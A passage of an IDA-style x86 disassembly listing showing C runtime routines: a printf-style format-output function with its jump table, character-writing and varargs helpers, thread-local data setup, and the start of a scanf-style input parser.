call sub_42586D
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_4252F7: ; CODE XREF: sub_42512C+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_42586D
add esp, 0Ch
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_42530F: ; CODE XREF: sub_42512C+6E�j
; DATA XREF: .text:off_42584D�o
movsx eax, bl ; jumptable 0042519A case 7
cmp eax, 67h
jg loc_425537
cmp eax, 65h
jge loc_4253BA
cmp eax, 58h
jg loc_425418
jz loc_4255AB
sub eax, 43h
jz loc_4253DB
dec eax
dec eax
jz short loc_4253B0
dec eax
dec eax
jz short loc_4253B0
sub eax, 0Ch
jnz loc_425736
test word ptr [ebp+var_4], 830h
jnz short loc_425359
or byte ptr [ebp+var_4+1], 8
loc_425359: ; CODE XREF: sub_42512C+227�j
; sub_42512C+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_425366
mov esi, 7FFFFFFFh
loc_425366: ; CODE XREF: sub_42512C+233�j
lea eax, [ebp+arg_8]
push eax
call sub_42590B
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_42557F
test ecx, ecx
jnz short loc_42538E
mov ecx, off_4496BC
mov [ebp+var_8], ecx
loc_42538E: ; CODE XREF: sub_42512C+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_425397: ; CODE XREF: sub_42512C+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_425576
cmp word ptr [eax], 0
jz loc_425576
inc eax
inc eax
jmp short loc_425397
; ---------------------------------------------------------------------------
loc_4253B0: ; CODE XREF: sub_42512C+212�j
; sub_42512C+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_4253BA: ; CODE XREF: sub_42512C+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_42549E
mov [ebp+var_10], 6
jmp loc_4254AC
; ---------------------------------------------------------------------------
loc_4253DB: ; CODE XREF: sub_42512C+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_4253E7
or byte ptr [ebp+var_4+1], 8
loc_4253E7: ; CODE XREF: sub_42512C+2B5�j
; sub_42512C+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_42542E
call sub_425928
push eax
lea eax, [ebp+var_248]
push eax
call sub_42B85E
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_425441
mov [ebp+var_28], 1
jmp short loc_425441
; ---------------------------------------------------------------------------
loc_425418: ; CODE XREF: sub_42512C+1FB�j
sub eax, 5Ah
jz short loc_42544F
sub eax, 9
jz short loc_4253E7
dec eax
jz loc_425611
jmp loc_425736
; ---------------------------------------------------------------------------
loc_42542E: ; CODE XREF: sub_42512C+2C5�j
call sub_42590B
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_425441: ; CODE XREF: sub_42512C+2E1�j
; sub_42512C+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_425736
; ---------------------------------------------------------------------------
loc_42544F: ; CODE XREF: sub_42512C+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_42590B
test eax, eax
pop ecx
jz short loc_425490
mov ecx, [eax+4]
test ecx, ecx
jz short loc_425490
test byte ptr [ebp+var_4+1], 8
jz short loc_425481
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_425736
; ---------------------------------------------------------------------------
loc_425481: ; CODE XREF: sub_42512C+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_425733
; ---------------------------------------------------------------------------
loc_425490: ; CODE XREF: sub_42512C+32F�j
; sub_42512C+336�j
mov eax, off_4496B8
mov [ebp+var_8], eax
push eax
jmp loc_42552C
; ---------------------------------------------------------------------------
loc_42549E: ; CODE XREF: sub_42512C+29D�j
jnz short loc_4254AC
cmp bl, 67h
jnz short loc_4254AC
mov [ebp+var_10], 1
loc_4254AC: ; CODE XREF: sub_42512C+2AA�j
; sub_42512C:loc_42549E�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call off_44BB60
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_4254FE
cmp [ebp+var_10], 0
jnz short loc_4254FE
lea eax, [ebp+var_248]
push eax
call off_44BB6C
pop ecx
loc_4254FE: ; CODE XREF: sub_42512C+3BC�j
; sub_42512C+3C2�j
cmp bl, 67h
jnz short loc_425515
test esi, esi
jnz short loc_425515
lea eax, [ebp+var_248]
push eax
call off_44BB64
pop ecx
loc_425515: ; CODE XREF: sub_42512C+3D5�j
; sub_42512C+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_42552B
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_42552B: ; CODE XREF: sub_42512C+3F0�j
push edi
loc_42552C: ; CODE XREF: sub_42512C+36D�j
call sub_422120
pop ecx
jmp loc_425733
; ---------------------------------------------------------------------------
loc_425537: ; CODE XREF: sub_42512C+1E9�j
sub eax, 69h
jz loc_425611
sub eax, 5
jz loc_4255E7
dec eax
jz loc_4255D4
dec eax
jz short loc_4255A4
sub eax, 3
jz loc_425359
dec eax
dec eax
jz loc_425615
sub eax, 3
jnz loc_425736
mov [ebp+var_2C], 27h
jmp short loc_4255B2
; ---------------------------------------------------------------------------
loc_425576: ; CODE XREF: sub_42512C+270�j
; sub_42512C+27A�j
sub eax, ecx
sar eax, 1
jmp loc_425733
; ---------------------------------------------------------------------------
loc_42557F: ; CODE XREF: sub_42512C+24F�j
test ecx, ecx
jnz short loc_42558C
mov ecx, off_4496B8
mov [ebp+var_8], ecx
loc_42558C: ; CODE XREF: sub_42512C+455�j
mov eax, ecx
loc_42558E: ; CODE XREF: sub_42512C+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_42559D
cmp byte ptr [eax], 0
jz short loc_42559D
inc eax
jmp short loc_42558E
; ---------------------------------------------------------------------------
loc_42559D: ; CODE XREF: sub_42512C+467�j
; sub_42512C+46C�j
sub eax, ecx
jmp loc_425733
; ---------------------------------------------------------------------------
loc_4255A4: ; CODE XREF: sub_42512C+425�j
mov [ebp+var_10], 8
loc_4255AB: ; CODE XREF: sub_42512C+201�j
mov [ebp+var_2C], 7
loc_4255B2: ; CODE XREF: sub_42512C+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_42561C
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_42561C
; ---------------------------------------------------------------------------
loc_4255D4: ; CODE XREF: sub_42512C+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_42561C
or byte ptr [ebp+var_4+1], 2
jmp short loc_42561C
; ---------------------------------------------------------------------------
loc_4255E7: ; CODE XREF: sub_42512C+417�j
lea eax, [ebp+arg_8]
push eax
call sub_42590B
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_425600
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_425605
; ---------------------------------------------------------------------------
loc_425600: ; CODE XREF: sub_42512C+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_425605: ; CODE XREF: sub_42512C+4D2�j
mov [ebp+var_28], 1
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_425611: ; CODE XREF: sub_42512C+2F7�j
; sub_42512C+40E�j
or [ebp+var_4], 40h
loc_425615: ; CODE XREF: sub_42512C+432�j
mov [ebp+var_C], 0Ah
loc_42561C: ; CODE XREF: sub_42512C+491�j
; sub_42512C+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_42562E
lea eax, [ebp+arg_8]
push eax
call sub_425918
pop ecx
jmp short loc_42566F
; ---------------------------------------------------------------------------
loc_42562E: ; CODE XREF: sub_42512C+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_425655
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_42564A
call sub_42590B
pop ecx
movsx eax, ax
loc_425647: ; CODE XREF: sub_42512C+527�j
; sub_42512C+539�j
cdq
jmp short loc_42566F
; ---------------------------------------------------------------------------
loc_42564A: ; CODE XREF: sub_42512C+510�j
call sub_42590B
pop ecx
movzx eax, ax
jmp short loc_425647
; ---------------------------------------------------------------------------
loc_425655: ; CODE XREF: sub_42512C+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_425667
call sub_42590B
pop ecx
jmp short loc_425647
; ---------------------------------------------------------------------------
loc_425667: ; CODE XREF: sub_42512C+531�j
call sub_42590B
pop ecx
xor edx, edx
loc_42566F: ; CODE XREF: sub_42512C+500�j
; sub_42512C+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_425690
test edx, edx
jg short loc_425690
jl short loc_42567F
test eax, eax
jnb short loc_425690
loc_42567F: ; CODE XREF: sub_42512C+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_425694
; ---------------------------------------------------------------------------
loc_425690: ; CODE XREF: sub_42512C+547�j
; sub_42512C+54B�j ...
mov esi, eax
mov edi, edx
loc_425694: ; CODE XREF: sub_42512C+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_42569D
and edi, 0
loc_42569D: ; CODE XREF: sub_42512C+56C�j
cmp [ebp+var_10], 0
jge short loc_4256AC
mov [ebp+var_10], 1
jmp short loc_4256B0
; ---------------------------------------------------------------------------
loc_4256AC: ; CODE XREF: sub_42512C+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_4256B0: ; CODE XREF: sub_42512C+57E�j
mov eax, esi
or eax, edi
jnz short loc_4256BA
and [ebp+var_1C], 0
loc_4256BA: ; CODE XREF: sub_42512C+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_4256C0: ; CODE XREF: sub_42512C+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_4256D0
mov eax, esi
or eax, edi
jz short loc_42570B
loc_4256D0: ; CODE XREF: sub_42512C+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_424A20
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_424AA0
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_425701
add ebx, [ebp+var_2C]
loc_425701: ; CODE XREF: sub_42512C+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_4256C0
; ---------------------------------------------------------------------------
loc_42570B: ; CODE XREF: sub_42512C+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_425736
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_425729
test eax, eax
jnz short loc_425736
loc_425729: ; CODE XREF: sub_42512C+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_425733: ; CODE XREF: sub_42512C+35F�j
; sub_42512C+406�j ...
mov [ebp+var_C], eax
loc_425736: ; CODE XREF: sub_42512C+21B�j
; sub_42512C+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_425834 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_42576E
test bh, 1
jz short loc_425753
mov [ebp+var_16], 2Dh
jmp short loc_425767
; ---------------------------------------------------------------------------
loc_425753: ; CODE XREF: sub_42512C+61F�j
test bl, 1
jz short loc_42575E
mov [ebp+var_16], 2Bh
jmp short loc_425767
; ---------------------------------------------------------------------------
loc_42575E: ; CODE XREF: sub_42512C+62A�j
test bl, 2
jz short loc_42576E
mov [ebp+var_16], 20h
loc_425767: ; CODE XREF: sub_42512C+625�j
; sub_42512C+630�j
mov [ebp+var_1C], 1
loc_42576E: ; CODE XREF: sub_42512C+61A�j
; sub_42512C+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_42578E
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4258A2
add esp, 10h
loc_42578E: ; CODE XREF: sub_42512C+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_4258D3
add esp, 10h
test bl, 8
jz short loc_4257C0
test bl, 4
jnz short loc_4257C0
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_4258A2
add esp, 10h
loc_4257C0: ; CODE XREF: sub_42512C+67B�j
; sub_42512C+680�j
cmp [ebp+var_24], 0
jz short loc_425807
cmp [ebp+var_C], 0
jle short loc_425807
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_4257D5: ; CODE XREF: sub_42512C+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_42B85E
pop ecx
test eax, eax
pop ecx
jle short loc_42581C
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_4258D3
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_4257D5
jmp short loc_42581C
; ---------------------------------------------------------------------------
loc_425807: ; CODE XREF: sub_42512C+698�j
; sub_42512C+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_4258D3
add esp, 10h
loc_42581C: ; CODE XREF: sub_42512C+6BC�j
; sub_42512C+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_425834 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4258A2
add esp, 10h
loc_425834: ; CODE XREF: sub_42512C+68�j
; sub_42512C+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_425158
loc_425845: ; CODE XREF: sub_42512C+1F�j
; sub_42512C+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_42512C endp
; ---------------------------------------------------------------------------
off_42584D dd offset loc_4252CB ; DATA XREF: sub_42512C+6E�r
dd offset loc_4251A1 ; jump table for switch statement
dd offset loc_4251BC
dd offset loc_425208
dd offset loc_42523F
dd offset loc_425247
dd offset loc_42527C
dd offset loc_42530F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42586D proc near ; CODE XREF: sub_42512C+1BD�p
; sub_42512C+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_425886
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_425891
; ---------------------------------------------------------------------------
loc_425886: ; CODE XREF: sub_42586D+9�j
push ecx
push [ebp+arg_0]
call sub_425014
pop ecx
pop ecx
loc_425891: ; CODE XREF: sub_42586D+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_42589E
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42589E: ; CODE XREF: sub_42586D+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_42586D endp
; =============== S U B R O U T I N E =======================================
sub_4258A2 proc near ; CODE XREF: sub_42512C+65A�p
; sub_42512C+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_4258D0
mov esi, [esp+8+arg_C]
loc_4258B3: ; CODE XREF: sub_4258A2+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_42586D
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_4258D0
mov eax, edi
dec edi
test eax, eax
jg short loc_4258B3
loc_4258D0: ; CODE XREF: sub_4258A2+B�j
; sub_4258A2+25�j
pop edi
pop esi
retn
sub_4258A2 endp
; =============== S U B R O U T I N E =======================================
sub_4258D3 proc near ; CODE XREF: sub_42512C+670�p
; sub_42512C+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_425907
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_4258E9: ; CODE XREF: sub_4258D3+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_42586D
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_425907
mov eax, ebx
dec ebx
test eax, eax
jg short loc_4258E9
loc_425907: ; CODE XREF: sub_4258D3+C�j
; sub_4258D3+2B�j
pop edi
pop esi
pop ebx
retn
sub_4258D3 endp
; =============== S U B R O U T I N E =======================================
sub_42590B proc near ; CODE XREF: sub_42512C+E5�p
; sub_42512C+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_42590B endp
; =============== S U B R O U T I N E =======================================
sub_425918 proc near ; CODE XREF: sub_42512C+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_425918 endp
; =============== S U B R O U T I N E =======================================
sub_425928 proc near ; CODE XREF: sub_42512C+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_425928 endp
; =============== S U B R O U T I N E =======================================
sub_425936 proc near ; CODE XREF: .text:loc_424F2E�p
push esi
call sub_42840D
call dword_42F1E4 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_4496C0, eax
jz short loc_425986
push 74h
push 1
call sub_423F63
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_425986
push esi
push dword_4496C0
call dword_42F1E8 ; TlsSetValue
test eax, eax
jz short loc_425986
push esi
call sub_42598A
pop ecx
call dword_42F21C ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
push 1
mov [esi], eax
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_425986: ; CODE XREF: sub_425936+14�j
; sub_425936+25�j ...
xor eax, eax
pop esi
retn
sub_425936 endp
; =============== S U B R O U T I N E =======================================
sub_42598A proc near ; CODE XREF: sub_425936+39�p
; sub_42599D+3F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword ptr [eax+50h], offset dword_44BEB0
mov dword ptr [eax+14h], 1
retn
sub_42598A endp
; =============== S U B R O U T I N E =======================================
sub_42599D proc near ; CODE XREF: sub_4220EF�p sub_4220FC�p ...
push esi
push edi
call dword_42F068 ; RtlGetLastWin32Error
push dword_4496C0
mov edi, eax
call dword_42F1DC ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_4259F8
push 74h
push 1
call sub_423F63
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4259F0
push esi
push dword_4496C0
call dword_42F1E8 ; TlsSetValue
test eax, eax
jz short loc_4259F0
push esi
call sub_42598A
pop ecx
call dword_42F21C ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_4259F8
; ---------------------------------------------------------------------------
loc_4259F0: ; CODE XREF: sub_42599D+2B�j
; sub_42599D+3C�j
push 10h
call sub_424FCB
pop ecx
loc_4259F8: ; CODE XREF: sub_42599D+1A�j
; sub_42599D+51�j
push edi
call dword_42F1E0 ; RtlSetLastWin32Error
mov eax, esi
pop edi
pop esi
retn
sub_42599D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425A04 proc near ; CODE XREF: sub_422725+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_42640A
mov edi, [ebp+arg_0]
jmp short loc_425A33
; ---------------------------------------------------------------------------
loc_425A2E: ; CODE XREF: sub_425A04+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_425A33: ; CODE XREF: sub_425A04+28�j
cmp dword_449A44, 1
jle short loc_425A4B
movzx eax, al
push 8
push eax
call sub_42653A
pop ecx
pop ecx
jmp short loc_425A5A
; ---------------------------------------------------------------------------
loc_425A4B: ; CODE XREF: sub_425A04+36�j
mov ecx, off_449838
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_425A5A: ; CODE XREF: sub_425A04+45�j
cmp eax, ebx
jz short loc_425A94
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_426491
pop ecx
pop ecx
push eax
call sub_42647A
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_423378
add esp, 0Ch
loc_425A82: ; CODE XREF: sub_425A04+8E�j
test eax, eax
jz short loc_425A94
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_423378
pop ecx
jmp short loc_425A82
; ---------------------------------------------------------------------------
loc_425A94: ; CODE XREF: sub_425A04+58�j
; sub_425A04+80�j
cmp byte ptr [esi], 25h
jnz loc_426376
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_425ACB: ; CODE XREF: sub_425A04+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp dword_449A44, 1
jle short loc_425AE8
movzx eax, bl
push 4
push eax
call sub_42653A
pop ecx
pop ecx
jmp short loc_425AF7
; ---------------------------------------------------------------------------
loc_425AE8: ; CODE XREF: sub_425A04+D3�j
mov ecx, off_449838
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_425AF7: ; CODE XREF: sub_425A04+E2�j
test eax, eax
jz short loc_425B0D
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_425B72
; ---------------------------------------------------------------------------
loc_425B0D: ; CODE XREF: sub_425A04+F5�j
cmp ebx, 4Eh
jg short loc_425B50
jz short loc_425B72
cmp ebx, 2Ah
jz short loc_425B4B
cmp ebx, 46h
jz short loc_425B72
cmp ebx, 49h
jz short loc_425B2D
cmp ebx, 4Ch
jnz short loc_425B5F
inc [ebp+var_D]
jmp short loc_425B72
; ---------------------------------------------------------------------------
loc_425B2D: ; CODE XREF: sub_425A04+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_425B5F
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_425B5F
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_425B72
; ---------------------------------------------------------------------------
loc_425B4B: ; CODE XREF: sub_425A04+113�j
inc [ebp+var_E]
jmp short loc_425B72
; ---------------------------------------------------------------------------
loc_425B50: ; CODE XREF: sub_425A04+10C�j
cmp ebx, 68h
jz short loc_425B6C
cmp ebx, 6Ch
jz short loc_425B64
cmp ebx, 77h
jz short loc_425B67
loc_425B5F: ; CODE XREF: sub_425A04+122�j
; sub_425A04+12D�j ...
inc [ebp+var_F]
jmp short loc_425B72
; ---------------------------------------------------------------------------
loc_425B64: ; CODE XREF: sub_425A04+154�j
inc [ebp+var_D]
loc_425B67: ; CODE XREF: sub_425A04+159�j
inc [ebp+var_5]
jmp short loc_425B72
; ---------------------------------------------------------------------------
loc_425B6C: ; CODE XREF: sub_425A04+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_425B72: ; CODE XREF: sub_425A04+107�j
; sub_425A04+10E�j ...
cmp [ebp+var_F], 0
jz loc_425ACB
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_425B97
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_425B97: ; CODE XREF: sub_425A04+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_425BB5
mov al, [esi]
cmp al, 53h
jz short loc_425BB1
cmp al, 43h
jz short loc_425BB1
or [ebp+var_5], 0FFh
jmp short loc_425BB5
; ---------------------------------------------------------------------------
loc_425BB1: ; CODE XREF: sub_425A04+1A1�j
; sub_425A04+1A5�j
mov [ebp+var_5], 1
loc_425BB5: ; CODE XREF: sub_425A04+19B�j
; sub_425A04+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_425BEE
cmp esi, 63h
jz short loc_425BDF
cmp esi, 7Bh
jz short loc_425BDF
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_426491
pop ecx
jmp short loc_425BEA
; ---------------------------------------------------------------------------
loc_425BDF: ; CODE XREF: sub_425A04+1C5�j
; sub_425A04+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_426460
loc_425BEA: ; CODE XREF: sub_425A04+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_425BEE: ; CODE XREF: sub_425A04+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_425BFE
cmp [ebp+var_C], eax
jz loc_4263DA
loc_425BFE: ; CODE XREF: sub_425A04+1EF�j
cmp esi, 6Fh
jg loc_425E65
jz loc_426117
cmp esi, 63h
jz loc_425E42
cmp esi, 64h
jz loc_426117
jle loc_425E8F
cmp esi, 67h
jle short loc_425C62
cmp esi, 69h
jz short loc_425C4A
cmp esi, 6Eh
jnz loc_425E8F
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_426345
jmp loc_42636B
; ---------------------------------------------------------------------------
loc_425C4A: ; CODE XREF: sub_425A04+229�j
push 64h
pop esi
loc_425C4D: ; CODE XREF: sub_425A04+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_425ED7
mov [ebp+var_17], 1
jmp loc_425EDC
; ---------------------------------------------------------------------------
loc_425C62: ; CODE XREF: sub_425A04+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_425C7E
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_425C83
; ---------------------------------------------------------------------------
loc_425C7E: ; CODE XREF: sub_425A04+26A�j
cmp ebx, 2Bh
jnz short loc_425C9A
loc_425C83: ; CODE XREF: sub_425A04+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_426460
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_425C9D
; ---------------------------------------------------------------------------
loc_425C9A: ; CODE XREF: sub_425A04+27D�j
mov edi, [ebp+arg_0]
loc_425C9D: ; CODE XREF: sub_425A04+294�j
cmp [ebp+var_20], 0
jz short loc_425CAC
cmp [ebp+var_C], 15Dh
jle short loc_425CB3
loc_425CAC: ; CODE XREF: sub_425A04+29D�j
mov [ebp+var_C], 15Dh
loc_425CB3: ; CODE XREF: sub_425A04+2A6�j
; sub_425A04+2F2�j
cmp dword_449A44, 1
jle short loc_425CC8
push 4
push ebx
call sub_42653A
pop ecx
pop ecx
jmp short loc_425CD3
; ---------------------------------------------------------------------------
loc_425CC8: ; CODE XREF: sub_425A04+2B6�j
mov eax, off_449838
mov al, [eax+ebx*2]
and eax, 4
